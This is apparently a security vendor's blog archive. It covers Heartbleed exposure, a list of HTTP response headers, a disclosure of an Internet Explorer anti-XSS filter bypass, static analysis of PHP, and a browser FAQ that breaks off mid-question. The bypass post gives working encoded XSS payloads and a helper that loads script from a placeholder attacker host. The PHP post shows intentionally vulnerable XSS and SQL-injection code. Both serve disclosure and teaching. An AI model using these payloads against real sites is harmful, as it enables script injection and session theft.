Category Archives: Tools and Applications

WhiteHat Security Observations and Advice about the Heartbleed OpenSSL Exploit

The Heartbleed SSL attack is one of the most significant, and most heavily covered, vulnerabilities to affect the Internet in recent years. According to Netcraft, 17.5% of SSL-enabled sites on the Internet were vulnerable to Heartbleed just prior to its disclosure.

The vulnerable versions of OpenSSL were first released to the public two years ago. The implications of two years of exposure to this vulnerability are significant, and we will explore them at the end of this article. First, the immediate details:

This attack does not require a MitM (Man in the Middle) position or the other complex setups that SSL exploits usually require. It can be executed directly and anonymously against any webserver/device running a vulnerable version of OpenSSL, and it yields a wealth of sensitive information.

WhiteHat Security’s Threat Research Center (TRC) began testing customers for this vulnerability immediately, using a custom SSL-testing tool from our TRC R&D labs. Our initial conclusion was that the frequency with which sites were vulnerable to this attack was low among production applications monitored by the WhiteHat Sentinel security service. In our first test sample, covering 18,000 applications, we found a vulnerability rate of about 2% – much lower than Netcraft’s 17.5% rate for all SSL-enabled websites. This may reflect a biased sample, since we only evaluated applications under Sentinel service: application owners who use Sentinel are likely already more security-conscious than most.

While the frequency of vulnerability to the Heartbleed SSL attack is low, those sites that are vulnerable are severely vulnerable: everything in memory on the webserver/device running a vulnerable version of OpenSSL is exposed. This includes:

  • UserIDs
  • Passwords
  • PII (Personally Identifiable Information)
  • SSL certificate private keys (i.e., if compromised, SSL traffic using this certificate will never be private again)
  • Any private crypto keys
  • SSL-based Chat
  • SSL-based VPN
  • SSL-based anything
  • Connection strings (database userIDs/passwords) to back-end databases, mainframes, LDAP, partner systems, etc., loaded in memory
  • Additional vulnerabilities in source code that is loaded into memory, with precise locations (e.g., blind SQL injection)
  • Basically, any code or data in memory on a server running a vulnerable version of OpenSSL is rendered in cleartext to attackers

The most important thing you need to know regarding the above: this attack leaves no traces. No logs. Nothing suspect. It is a nice, friendly, read-only anonymous dump of memory. This is the digital equivalent of accidentally leaving a copy of your corporate diary, with all sorts of private secrets, on the seat of the mass-transit bus for everyone to read – including strangers you will never know. Your only recourse for secrets like passwords now is the delete key.

The list of vulnerable applications published to date includes mainstream web and mobile applications, security devices with web interfaces, and critical business applications handling sensitive and federally-regulated data.

This is a seriously sub-optimal situation.

Timeline of the Heartbleed SSL attack and WhiteHat Security’s response:

April 7th: Heartbleed 0day attack published. Websites vulnerable to the attack included major websites/email services that the majority of the Internet uses daily, and many mobile applications that use OpenSSL.

April 8th: WhiteHat TRC begins testing customers’ sites for vulnerability to Heartbleed SSL exploitation. In parallel, WhiteHat R&D begins QAing new automated tests to enable Sentinel services to identify this vulnerability at scale.

April 9th: WhiteHat TRC identifies roughly 350 websites vulnerable to the Heartbleed SSL attack out of an initial sample of 18,000 production applications. We find an initial average exploitability rate of 1.9%, but this percentage drops rapidly over the following 48 hours.

April 10th: WhiteHat R&D releases new Sentinel Heartbleed SSL vulnerability tests, enabling Sentinel to automatically identify if any applications under Sentinel service are vulnerable to Heartbleed SSL attacks with every scan. This brings test coverage to over 35,000 applications. Average vulnerability rate drops to below 1% by EOD April 10th.

Analysis: the more applications we scan using the new Heartbleed SSL attack tests, the fewer sites (by percent) we find vulnerable to this attack. We suspect this is because most customers have moved quickly to patch this vulnerability, due to the extreme severity of the vulnerability and the intense media coverage of the issue.

Speculation: we suspect that this issue will quickly disappear for most important SSL-enabled applications on the Internet – especially applications under some type of active DAST or SAST scanning service. It will likely linger on small sites hosted by providers that do not offer (or pay attention to) any form of security patching service.

We also expect this issue to persist with internal (non-Internet-facing) applications and devices that use SSL, but which are commonly not tested or monitored by tools or services capable of detecting this vulnerability, and that are less frequently upgraded.

While the attack surface of internal network applications & devices may appear to be much smaller than Internet-facing applications, simple one-click exploits are already available on the Internet, usable by anyone on your network with access to a web browser. (link to exploit code: http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html)

This means that any internal user on your network who downloads one of these exploits is capable of extracting everything in memory from any vulnerable device or application on your internal network. This includes:

  • Internal routers and switches
  • Firewalls and IDS systems
  • Human Resources applications
  • Finance and payroll applications
  • Pretty much any application or device running a vulnerable version of OpenSSL

Agents exploiting internal devices will see all network traffic or application data held in memory on the affected device or application.

Because most of these internal applications and devices lack the kind of logging and alerting that would notify information security teams of active abuse of this vulnerability, our concern is that in the coming months these internal devices and applications may provide rich grounds for exploitation that may never be discovered.
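
For defenders who want to find these internal systems before someone else does, one low-effort option is to scan your own address space for the vulnerability. As a sketch – this assumes a recent nmap build that ships the ssl-heartbleed NSE script, and the IP range is a placeholder for your own environment:

nmap -p 443 --script ssl-heartbleed 192.168.1.0/24

Hosts flagged by the script should be prioritized for patching, certificate rotation, and credential changes.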

Conclusion & Recommendations:
The scope, impact, and ease of exploitation of this vulnerability make it one of the worst in Internet history. However, patches are readily available for most systems, and the risk of adverse impact from patching appears minimal. It appears most of our customers have already patched the majority of their Internet-facing systems against this exploit.

However, this vulnerability has existed for up to two years in OpenSSL implementations. We will likely never know whether anyone has been actively exploiting it, due to the difficulty of logging and tracking attacks. If your organization is concerned about this, we recommend that – in addition to patching this vulnerability – the SSL certificates of suspect systems be revoked and re-issued. We also recommend that all end-user passwords and system passwords on suspect systems be changed.

Is this vulnerability a “boy who cried wolf” hype situation? Bruce Schneier has another interesting perspective on this: https://www.schneier.com/blog/archives/2014/04/heartbleed.html.

WhiteHat will continue to share more information about this vulnerability as further information becomes available.

General reference material:
https://blog.whitehatsec.com/heartbleed-openssl-vulnerability/
https://www.schneier.com/blog/archives/2014/04/heartbleed.html

Vulnerability details:
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0160
https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2014-0160

Exploit details:
http://samiux.blogspot.com/2014/04/exploit-dev-heartbleed-cve-2014-0160.html

Summaries:
http://business.kaspersky.com/the-heart-is-bleeding-out-a-new-critical-bug-found-in-openssl/
http://news.netcraft.com/archives/2014/04/08/half-a-million-widely-trusted-websites-vulnerable-to-heartbleed-bug.html

Adding Open Source Framework Hardening to Your SDLC – Podcast

I talk with G.S. McNamara, Federal Information Security Senior Consultant, about fixing open source framework vulnerabilities, what to consider when pushing open source, how to implement a system around patches without impacting performance, and security considerations in framework selection.

Want to do a podcast with us? Sign up to be part of our Unsung Hero program.

About our “Unsung Hero Program”
Every day, app sec professionals tirelessly protect the Web, and we recognize that this protection is largely owed to a series of small victories – untold stories. We want to help share your story. To learn more, click here.

List of HTTP Response Headers

Every few months I find myself looking up the syntax of a relatively obscure HTTP header, and I regularly wonder why there isn’t a good, definitive list of common HTTP response headers anywhere. The lists on the Internet are usually missing half a dozen headers. So I’ve taken care to gather a list of all the HTTP response headers I could find. Hopefully this is useful to you, and removes some of the mystique behind how HTTP works if you’ve never seen headers before.

Note: this does not include non-standard proxy- or service-specific headers (such as IncapIP), nor does it include request headers.
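
If you’ve never looked at raw response headers, the quickest way to see them for a given site is to issue a HEAD request from the command line – for example, with curl (any URL will do):

curl -sI http://www.example.com/

The -I flag tells curl to make a HEAD request and print the response headers; -s suppresses the progress meter.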

Each header below is listed as it would appear in a response, followed by an example value; explanatory notes follow in parentheses.

Access-Control-Allow-Credentials: true
Access-Control-Allow-Headers: X-PINGOTHER
Access-Control-Allow-Methods: PUT, DELETE, XMODIFY
Access-Control-Allow-Origin: http://example.org
Access-Control-Expose-Headers: X-My-Custom-Header, X-Another-Custom-Header
Access-Control-Max-Age: 2520
Accept-Ranges: bytes
Age: 12
Allow: GET, HEAD, POST, OPTIONS (commonly includes other methods, like PROPFIND)
Alternate-Protocol: 443:npn-spdy/2,443:npn-spdy/2
Cache-Control: private, no-cache, must-revalidate
Client-Date: Tue, 27 Jan 2009 18:17:30 GMT
Client-Peer: 123.123.123.123:80
Client-Response-Num: 1
Connection: Keep-Alive
Content-Disposition: attachment; filename="example.exe"
Content-Encoding: gzip
Content-Language: en
Content-Length: 1329
Content-Location: /index.htm
Content-MD5: Q2hlY2sgSW50ZWdyaXR5IQ==
Content-Range: bytes 21010-47021/47022
Content-Security-Policy: default-src 'self' (the X-Content-Security-Policy and X-WebKit-CSP variants are needed to control different browsers)
Content-Security-Policy-Report-Only: default-src 'self'; …; report-uri /csp_report_parser;
Content-Type: text/html (can also include charset information, e.g. text/html;charset=ISO-8859-1)
Date: Fri, 22 Jan 2010 04:00:00 GMT
ETag: "737060cd8c284d8af7ad3082f209582d"
Expires: Mon, 26 Jul 1997 05:00:00 GMT
HTTP/1.1 401 Unauthorized (the status line is a special header with no colon-space delimiter)
Keep-Alive: timeout=3, max=87
Last-Modified: Tue, 15 Nov 1994 12:45:26 +0000
Link: <http://www.example.com/>; rel="canonical" (other relations, such as rel="alternate", are also common)
Location: http://www.example.com/
P3P: policyref="http://www.example.com/w3c/p3p.xml", CP="NOI DSP COR ADMa OUR NOR STA"
Pragma: no-cache
Proxy-Authenticate: Basic
Proxy-Connection: Keep-Alive
Refresh: 5; url=http://www.example.com/
Retry-After: 120
Server: Apache
Set-Cookie: test=1; domain=example.com; path=/; expires=Tue, 01-Oct-2013 19:16:48 GMT (can also include the Secure and HttpOnly flags)
Status: 200 OK
Strict-Transport-Security: max-age=16070400; includeSubDomains
Timing-Allow-Origin: www.example.com
Trailer: Max-Forwards
Transfer-Encoding: chunked (other values include compress, deflate, gzip, and identity)
Upgrade: HTTP/2.0, SHTTP/1.3, IRC/6.9, RTA/x11
Vary: *
Via: 1.0 fred, 1.1 example.com (Apache/1.1)
Warning: 199 Miscellaneous warning
WWW-Authenticate: Basic
X-Aspnet-Version: 2.0.50727
X-Content-Type-Options: nosniff
X-Frame-Options: deny
X-Permitted-Cross-Domain-Policies: master-only (used by Adobe Flash)
X-Pingback: http://www.example.com/pingback/xmlrpc
X-Powered-By: PHP/5.4.0
X-Robots-Tag: noindex,nofollow
X-UA-Compatible: Chrome=1
X-XSS-Protection: 1; mode=block

If I’ve missed any response headers, please let me know by leaving a comment and I’ll add them to the list. Perhaps at some point I’ll create a similar list for request headers, if people find this one helpful enough.

Bypassing Internet Explorer’s Anti-Cross Site Scripting Filter

There’s a problem with the reflective Cross Site Scripting ("XSS") filter in Microsoft’s Internet Explorer family of browsers that extends from version 8.0 (where the filter first debuted) through the most current version, 11.0, released in mid-October for Windows 8.1, and early November for Windows 7.

In the simplest possible terms, the problem is that the anti-XSS filter only compares the untrusted request from the user and the response body from the website for reflections that could cause immediate JavaScript or VBScript code execution. Should an injection from that initial request reflect on the page but not cause immediate JavaScript code execution, the untrusted data from that injection is marked as trusted data, and the anti-XSS filter will not check it in future requests.

To reiterate: Internet Explorer’s anti-XSS filter divides the data it sees into two categories: untrusted and trusted. Untrusted data is subject to the anti-XSS filter, while trusted data is not.

As an example, let’s suppose a website contains an iframe definition where an injection on the "xss" parameter reflects in the src="" attribute. The page referenced in the src="" attribute contains an XSS vulnerability such that:

GET http://vulnerable-iframe/inject?xss=%3Ctest-injection%3E

results in the “xss” parameter being reflected in the page containing the iframe as:

<iframe src="http://vulnerable-page/?vulnparam=<test-injection>"></iframe>

and the vulnerable page would then render as:

Some text <test-injection> some more text
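
To make the setup concrete, here is a minimal PHP sketch of what these two hypothetical pages might look like (illustrative code only – not taken from any real site; both pages reflect their parameters without encoding):

<?php
// The page containing the iframe (http://vulnerable-iframe/inject).
// The "xss" parameter is reflected, unencoded, into the iframe's src attribute.
echo '<iframe src="http://vulnerable-page/?vulnparam=' . $_GET['xss'] . '"></iframe>';

<?php
// The vulnerable page itself (http://vulnerable-page/).
// The "vulnparam" parameter is reflected, unencoded, into the page body.
echo 'Some text ' . $_GET['vulnparam'] . ' some more text';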

Should a user make a request directly to the vulnerable page in an attempt to reflect <script src=http://attacker/evil.js></script> as follows:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter sees that the injection would result in immediate JavaScript code execution and subsequently modifies the response body to prevent that from occurring.

Even when the request is made to the page containing the iframe as follows:

GET http://vulnerable-iframe/inject?xss=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

and Internet Explorer’s anti-XSS filter sees it reflected as:

<iframe src="http://vulnerable-page/?vulnparam=<script src=http://attacker/evil.js></script>"></iframe>

which, because it looks like it might cause immediate JavaScript code execution, will also be altered.

To get around the anti-XSS filter in Internet Explorer, an attacker can make use of two parts of the HTML standard: decimal character encodings and hexadecimal character encodings.

Hexadecimal encodings were made part of the official HTML standard in 1998 with HTML 4.0 (3.2.3: Character references), while decimal encodings go back further, to the first official HTML standard, HTML 2.0, in 1995 (ISO Latin 1 Character Set). When a browser sees a properly encoded decimal or hexadecimal character in the body of an HTTP response, it will automatically decode and display for the user the character referenced by the encoding.

As an added bonus for an attacker, when a decimal or hexadecimal encoded character is returned in an attribute that is then included in a subsequent request, it is the decoded character that is sent, not the decimal or hexadecimal encoding of that character.

Thus, all an attacker needs to do is fool Internet Explorer’s anti-XSS filter by inducing some of the desired characters to be reflected as their decimal or hexadecimal encodings in an attribute.
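
As an illustration of how such a payload could be prepared, here is a small PHP helper (our own hypothetical example, not part of the original research) that replaces selected characters with their decimal HTML character references:

<?php
// Replace each character in $chars with its decimal HTML character reference.
function encode_chars($payload, $chars) {
    foreach ($chars as $c) {
        $payload = str_replace($c, '&#' . ord($c) . ';', $payload);
    }
    return $payload;
}

// Encoding just a few letters is enough to change what the filter sees.
echo encode_chars('<script src=http://attacker/evil.js></script>', array('c', 'r', 'p'));
// Output: <s&#99;&#114;i&#112;t s&#114;&#99;=htt&#112;://atta&#99;ke&#114;/evil.js></s&#99;&#114;i&#112;t>

URL-encode the result (so that, for example, "&" becomes "%26") and it is ready to be used as the value of the "xss" parameter.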

To return to the iframe example, instead of the obviously malicious injection, a slightly modified injection will be used:

Partial Decimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%20s%26%23114%3B%26%2399%3B%3Dht%26%23116%3Bp%3A%2F%2Fa%26%23116%3Bta%26%2399%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%2399%3B%26%23114%3Bi%26%23112%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#99;&#114;i&#112;t s&#114;&#99;=ht&#116;p://a&#116;ta&#99;ker/evil.js></s&#99;&#114;i&#112;t>"></iframe>

or

Partial Hexadecimal Encoding:
GET http://vulnerable-iframe/inject?xss=%3Cs%26%23x63%3Bri%26%23x70%3Bt%20s%26%23x72%3Bc%3Dhttp%3A%2F%2Fatta%26%23x63%3Bker%2Fevil%2Ejs%3E%3C%2Fs%26%23x63%3Bri%26%23x70%3Bt%3E

which reflects as:

<iframe src="http://vulnerable-page/?vulnparam=<s&#x63;ri&#x70;t s&#x72;c=http://atta&#x63;ker/evil.js></s&#x63;ri&#x70;t>"></iframe>

Internet Explorer’s anti-XSS filter does not see either of those injections as potentially malicious, and the reflections of the untrusted data in the initial request are marked as trusted data and will not be subject to future filtering.

The browser, however, sees those injections, and will decode them before including them in the automatically generated request for the vulnerable page. So when the following request is made from the iframe definition:

GET http://vulnerable-page/?vulnparam=%3Cscript%20src%3Dhttp%3A%2F%2Fattacker%2Fevil%2Ejs%3E%3C%2Fscript%3E

Internet Explorer’s anti-XSS filter will ignore the request completely, allowing it to reflect on the vulnerable page as:

Some text <script src=http://attacker/evil.js></script> some more text

Unfortunately (or fortunately, depending on your point of view), this methodology is not limited to iframes. Any place where an injection lands in the attribute space of an HTML element, which is then relayed onto a vulnerable page on the same domain, can be used. Form submissions where the injection reflects either inside the "action" attribute of the form element or in the "value" attribute of an input element are two other instances that may be used in the same manner as with the iframe example above.

Beyond that, in cases where there is only the single page where:

GET http://vulnerable-page/?xss=%3Ctest-injection%3E

reflects as:

Some text <test-injection> some more text

the often under-appreciated sibling of Cross Site Scripting, Content Spoofing, can be utilized to perform the same attack. In this example, an attacker would craft a link that would reflect on the page as:

Some text <div style=some-css-elements><a href=?xss=&#x3C;s&#x63;ri&#x70;t&#x20;s&#x72;c&#x3D;htt&#x70;://atta&#x63;ker/evil.js&#x3E;&#x3C;/s&#x63;ri&#x70;t&#x3E;>Requested page has moved here</a></div> some more text

Then when the victim clicks the link, the same page is called, but now with the injection being fully decoded:

Some text <script src=http://attacker/evil.js></script> some more text

This is the flaw in Internet Explorer’s anti-XSS filter. It only looks for injections that might immediately result in JavaScript code execution. Should an attacker find a way to relay the injection within the same domain — be it by frames/iframes, form submissions, embedded links, or some other method — the untrusted data injected in the initial request will be treated as trusted data in subsequent requests, completely bypassing Internet Explorer’s anti-Cross Site Scripting filter.

Afterword:

After Microsoft made its decision not to work on a fix for this issue, it was requested that the following link to their design philosophy blog post be included in any public disclosures that may occur. In particular the third category, which discusses "application-specific transformations" and the possibility of an application that would "ROT13 decode" values before reflecting them, was pointed to in Microsoft’s decision to allow this flaw to continue to exist.

http://blogs.msdn.com/b/dross/archive/2008/07/03/ie8-xss-filter-design-philosophy-in-depth.aspx

The "ROT13 decode" and "application-specific transformations" mentions do not apply. Everything noted above is part of the official HTML standard, and has been so since at least 1998 — if not earlier. There is no "only appears in this one type of application" functionality being used. The XSS injection reflects in the attribute space of an element and is then relayed onto a vulnerable page (either another page, or back to itself) where it then executes.

Additionally, the use of decimal and hexadecimal encodings is not itself the flaw; they are merely two encodings that take advantage of the method that exploits the flaw. Often, simple URL/URI encodings (mentioned as early as 1994 in RFC 1630) can be used in their place.

The flaw in Internet Explorer’s anti-XSS filter is that injected untrusted data can be turned into trusted data, and that trusted data is not subject to validation by the filter.

Post Script:

The author has adapted this post from his original work, which can be found here:

http://rtwaysea.net/blog/blog-2013-10-18-long.html

Announcing Support for PHP in WhiteHat Sentinel Source

It is with great pleasure that I formally announce support for the PHP programming language in WhiteHat Sentinel Source! Joining Java and C#, PHP is now a member of the family of languages supported by our static code analysis technology. Effective immediately, our users can start scheduling static analysis scans of web applications developed in PHP for security vulnerabilities. Accurately and efficiently supporting the PHP language was a tremendous engineering effort, and a great reflection on our Engine and Research and Development teams.

Static code analysis for security of the PHP programming language is nothing new. Open source and commercial vendors have claimed support for this language for quite some time. So what’s so special about the support for PHP in WhiteHat Sentinel Source? The answer centers on an advance in the ability of static analysis to model and simulate the execution of PHP accurately. Almost every other PHP static code analysis offering is limited by the fact that it cannot overcome the unique challenges presented by dynamic programming languages, such as dynamic typing. Without the ability to accurately model the type information associated with expressions and statements, users have been unable to correctly capture the rules needed to identify security vulnerabilities. WhiteHat Sentinel Source’s PHP offering ships with a highly tuned type inference system that piggy-backs on our patented Runtime Simulation algorithm to provide much deeper insight into source code – thereby overcoming the limitations of previous technologies.

Here is a classic PHP vulnerability that most, if not all, static code analysis tools should identify as a Cross-Site Scripting vulnerability:


<?php
// Source: untrusted data from the HTTP request.
$unsafe_variable = $_GET['user_input'];

// Sink: the untrusted data is echoed into the HTML response unencoded.
echo "You searched for:<strong>".$unsafe_variable."</strong>";

This code retrieves untrusted data from the HTTP request, concatenates that input with string literals, and finally echoes the dynamically constructed content out to the HTML page. Writing static code analysis rules for this case is fairly straightforward for any engine capable of data flow analysis: the return value of the $_GET field access is a source of untrusted data, and the first argument to the echo invocation is a sink. Why is this easy to capture? Well… the signatures for the data types represented in the rules are incredibly simple. For example, the signature for echo is “echo(object)”, where “echo” is the function name and “(object)” indicates that it accepts one argument whose data type is unknown. We assume all parameter types are of type ‘object’ to keep things simple; we cannot possibly know all parameter types for all function invocations without performing richer analysis. Static analysis tools all have their own unique way of capturing security rules using a custom language. To keep discussions about static analysis security rules vendor agnostic, we will only discuss rule writing and rule matching at the code signature level. Let’s agree on the format [class name]->[function name]([one or more parameters]).

Let’s make this a little more interesting. Consider the following PHP code snippet that may or may not be indicative of a SQL Injection vulnerability:



<?php
// Instantiate a third-party class and pass untrusted request data to its query method.
$anonymous = new Anonymous();

$anonymous->runQuery($_GET['name']);


This code instantiates a class called “Anonymous” and invokes the “runQuery” method of that class using untrusted data from the HTTP request. Is this vulnerable to SQL Injection? Well – it depends on what runQuery does. Let’s assume that the Anonymous class is part of a 3rd-party library for which we do not have the source, or which we simply do not want to include in the scan. Let’s also assume that we know runQuery dynamically generates and executes SQL queries and is thus considered a sink. Based on these assumptions, a manual code review would clearly conclude that yes, this is vulnerable to SQL Injection. But how would we do this with static analysis? Here’s where it gets tricky…

We want to mark the “runQuery” method of the “Anonymous” type as a sink for SQL commands, such that if untrusted data is used as an argument to this method, then we have SQL Injection. The problem is that we need to capture not only information about “runQuery” in our sink rule, but also the fact that it is associated with the “Anonymous” class. The code signature that must be reflected in the security rule would look as follows: Anonymous->runQuery(object).

Unfortunately, basic forms of static analysis are unable to determine with reasonable confidence that the $anonymous variable is of type Anonymous – in fact, $anonymous could be of any type! As a result, the underlying engine is never able to match the security rule to the $anonymous->runQuery($_GET['name']) statement, resulting in a lost vulnerability.

How does WhiteHat Sentinel Source’s PHP offering overcome this problem? It’s simple… in theory. When the engine first runs, it builds a model of the source code and attempts to compare the sink rule against the $anonymous->runQuery($_GET['name']) method invocation. At this point, the only information we have about this statement is the method name and the number of arguments, producing a code signature as follows: ?->runQuery(object). Compare this signature to the signature represented in our sink rule: Anonymous->runQuery(object). Since we cannot know the type of the $anonymous variable at this point, we perform a partial match, comparing only the method name and arguments to those captured in the security rule. Since the statement’s signature is a partial match to our rule’s signature, we mark the model as such and move on.

After processing all our security rules, the static code analysis engine begins performing data flow analysis on top of our patented Runtime Simulation algorithm, looking for security vulnerabilities. The engine first sees the expression “$anonymous = new Anonymous();” and records the fact that the $anonymous variable may, at any point in the future, be of type “Anonymous”. Next, the engine hits the statement “$anonymous->runQuery($_GET['name']);”. This statement was previously marked with a SQL Injection sink via a partial match. We now have more information about the $anonymous variable and can check whether it is a full match with the original security rule. The statement’s signature is now known to be Anonymous->runQuery(object), which fully matches the signature represented by the sink security rule. With a full match realized, the engine treats this statement as a sink and flags the SQL Injection vulnerability correctly!
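
To illustrate the idea (this is a toy model of our own, not the actual engine), partial matching compares only the method name and argument count, while full matching additionally requires that one of the inferred receiver types matches the class named in the rule:

<?php
// Toy model of signature matching against a sink rule: Anonymous->runQuery(object).
$rule = array('class' => 'Anonymous', 'method' => 'runQuery', 'argc' => 1);

// Partial match: used before type inference resolves the receiver's type.
function partial_match($rule, $method, $argc) {
    return $rule['method'] === $method && $rule['argc'] === $argc;
}

// Full match: once inference yields candidate types for the receiver,
// any candidate equal to the rule's class completes the match.
function full_match($rule, $candidate_types, $method, $argc) {
    return partial_match($rule, $method, $argc)
        && in_array($rule['class'], $candidate_types);
}

var_dump(partial_match($rule, 'runQuery', 1));                   // bool(true)
var_dump(full_match($rule, array('Anonymous'), 'runQuery', 1));  // bool(true)

The same full-match check naturally handles the multi-branch case discussed next: the engine simply passes every candidate type it has recorded for the variable.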

Ok – that was a little too easy. Let’s make this more challenging… consider the following PHP code snippet:


<?php
// The runtime type of $anonymous depends on which branch executes.
$anonymous = null;

if (funct_a() > funct_b()) {
    $anonymous = new Anonymous();
} elseif (funct_a() == funct_b()) {
    $anonymous = new NotSoAnonymous();
} else {
    $anonymous = new NsaAnonymous();
}

$anonymous->runQuery($_GET['name']);

What the heck does the engine do now when it sees the runQuery statement? The engine collects all data type assignments for the $anonymous variable and uses all such types in an attempt to realize a full match for the runQuery statement. The engine will see three different possible code signatures for the statement:

Anonymous->runQuery(object)
NotSoAnonymous->runQuery(object)
NsaAnonymous->runQuery(object)

The engine takes these three signatures and compares them to the data type found in the signature represented by the partially matched security rule. Given that the first of the three signatures fully matches the signature represented by the security rule, the engine treats the statement as a sink and flags the SQL Injection vulnerability correctly!

You may be asking yourself: “What if $anonymous was of type NotSoAnonymous or NsaAnonymous? Would it still flag a vulnerability?” The answer is a resounding yes. Static analysis technologies do not, and in my opinion should not, attempt to evaluate conditionals, as such practice would lead to an overwhelming number of lost vulnerabilities. Static code analysis could support trivial conditionals, such as comparisons of primitives, but conditionals in real-world code require much more guesswork and various forms of heuristics that ultimately lead to poor results. Even so, is it not fair to say that at some point in the application funct_a() will return a value greater than funct_b()? Otherwise, what is the point of the conditional in the first place? Our technology assumes all conditionals will be true at some point in time.

Remember when I said this was easy in theory? Well, this is where it starts to get really interesting: Consider the following code snippet and assume we do not have the source code available for “create_class_1()”, “create_class_2()” and “create_class_3()”:


<?php
// The factory functions live in code we cannot (or choose not to) scan,
// so their return types are unknown to the engine.
$anonymous = null;

if (funct_a() > funct_b()) {
    $anonymous = create_class_1();
} elseif (funct_a() == funct_b()) {
    $anonymous = create_class_2();
} else {
    $anonymous = create_class_3();
}

$anonymous->runQuery($_GET['name']);

Now what is the range of possible data types for the $anonymous variable when it is used in the vulnerable statement? This is where we begin to stress the capabilities of the security rule language itself. WhiteHat Sentinel Source solves this by allowing the security rule writer to explicitly define the data type returned from a function invocation when that data type cannot be determined from the provided source code. For example, the rule writer could capture a rule stating that the return value of the create_class_3() function invocation is of type Anonymous. The engine then takes this information, propagates data types as before, and correctly flags the SQL Injection vulnerability associated with the runQuery method invocation.
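
Continuing the earlier toy model, such a rule can be thought of as a simple lookup table that seeds the type-inference pass (purely illustrative – the class names other than Anonymous are invented for this example):

<?php
// Hypothetical return-type annotations for functions whose source is unavailable.
$return_types = array(
    'create_class_1' => 'SomeOtherRunner',
    'create_class_2' => 'SomeOtherRunner',
    'create_class_3' => 'Anonymous',
);

// When the engine sees "$anonymous = create_class_3();", it records
// $return_types['create_class_3'] as a candidate type for $anonymous,
// after which the usual partial-to-full match promotion applies.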

WhiteHat Sentinel Source’s type inference system allows us to perform more accurate and efficient analysis of source code in dynamically typed languages. It not only allows us to capture security rules more accurately, but also to more accurately model control flow from method invocations on instances to the corresponding method declarations in class declarations. Such capability is critical for any real-world static code analysis of PHP source code.

I hope you enjoyed this rather technical and slightly lengthy blog post. It was a blast building out support for PHP and I look forward to our Sentinel Source customers benefiting from our newly available technology. Until next time…

Aviator: Some Answered Questions

We publicly released Aviator on Monday, Oct 21. Since then we’ve received an avalanche of questions, suggestions, and feature requests regarding the browser. The level of positive feedback and support has been overwhelming. Lots of great ideas and comments that will help shape where we go from here. If you have something to share, a question or concern, please contact us at aviator@whitehatsec.com.

Now let’s address some of the most often heard questions so far:

Where’s the source code to Aviator?

WhiteHat Security is still in the very early stages of Aviator’s public release and we are gathering all feedback internally. We’ll be using this feedback to prioritize where our resources will be spent. Deciding whether or not to release the source code is part of these discussions.

Aviator utilizes open source software via Chromium; don’t you have to release the source?

WhiteHat Security respects and appreciates the open source software community. We’ve long supported various open source organizations and projects throughout our history. We also know how important OSS licenses are, so we diligently studied what would be required when Aviator became publicly available.

Chromium, from which Aviator is derived, contains a wide variety of OSS licenses, as can be seen by visiting aviator://credits/ in Aviator or chrome://credits/ in Google Chrome. The portions of the code we modified in Aviator are all under BSD, or BSD-like, licenses. As such, publishing our changes is, strictly speaking, not a licensing requirement. This is not to say we won’t in the future, just that we’re discussing it internally first; doing so is a big decision that shouldn’t be taken lightly. Of course, if and when we make a change to GPL or similarly licensed software in Chromium, we’ll happily publish the updates as required.

When is Aviator going to be available for Windows, Linux, iOS, Android, etc.?

Aviator was originally an internal project designed for WhiteHat Security employees. This served as a great environment to test our theories about how a truly secure and privacy-protecting browser should work. Since WhiteHat is primarily a Mac shop, we built it for OS X. Those outside of WhiteHat wanted to use the same browser that we did, so this week we made Aviator publicly available.

We are still in the very early days of making Aviator available to the public. The feedback so far has been very positive, and requests for Windows, Linux, and even open source versions are pouring in, so we are determining where to focus our resources next; however, there is no definite timeframe yet for when other versions will be available.

How long has WhiteHat been working on Aviator?

Browser security has been a subject of personal and professional interest for both me and Robert “RSnake” Hansen (Director, Product Management) for years. Both of us have discussed the risks of browser security around the world. A big part of the Aviator research was spent creating something to protect WhiteHat employees and the data they are responsible for. Outside of WhiteHat, many people ask us what browser we use. Individually, our answer has been “mine.” Now we can be more specific: that browser is Aviator – a browser we feel confident using not only for our own security and privacy, but one we can confidently recommend to family and friends when asked.

Browsers have pop up blockers to deal with ads. What is different about Aviator’s approach?

Popup blockers used to work wonders, but advertisers switched to sourcing in JavaScript and actually putting content on the page. They no longer have to create a new window, because they can take over the entire page. With Aviator, the user’s browser doesn’t even make a connection to an advertising network’s servers, so obnoxious or potentially dangerous ads simply don’t load.

Why isn’t the Aviator application binary signed?

During the initial phases of development we considered releasing Aviator as a Beta through the Mac Store. Browsers try to take advantage of the fastest rendering paths they can, and these often rely on undocumented OS interfaces known as “private APIs”. Apple does not support these APIs because they may change, and Apple doesn’t want to be held accountable when things break. As a result, while Apple allows people to use these undocumented, high-speed private APIs, it doesn’t allow distribution of applications that use them through the Mac Store. We can speculate that the reason is that users are likely to blame Apple, rather than the application, when things break. So after about a month of wrestling with it, we decided that, for now, we’d avoid the Mac Store. In the shuffle we didn’t continue signing the binaries as we had been. It was simply an oversight.

Why is Aviator’s application directory world-writable?

During the development process all of our developers were on dedicated computers, not shared computers, so this was an oversight: there was no need to hide data from one another, and chmod permissions became too lax as source files were copied and edited. This wouldn’t have been an issue had the permissions been changed back to a more restrictive state, but that step was missed. We will get it fixed in an upcoming release.

Update: November 8, 2013:
Our dev team analyzed the overly-permissive chmod settings that Aviator 1.1 shipped with. We agreed it was overly permissive and have fixed the issue to be more in line with existing browsers to protect users on multi-user systems. Click to read more on our Aviator Browser 1.2 Beta release.

Does Aviator support Chrome extensions?

Yes, all Chrome extensions should function under Aviator. If an issue comes up, please report it to aviator@whitehatsec.com so we can investigate.

Wait a minute: first you say, “if you aren’t paying, you are the product,” and then you offer a free browser?

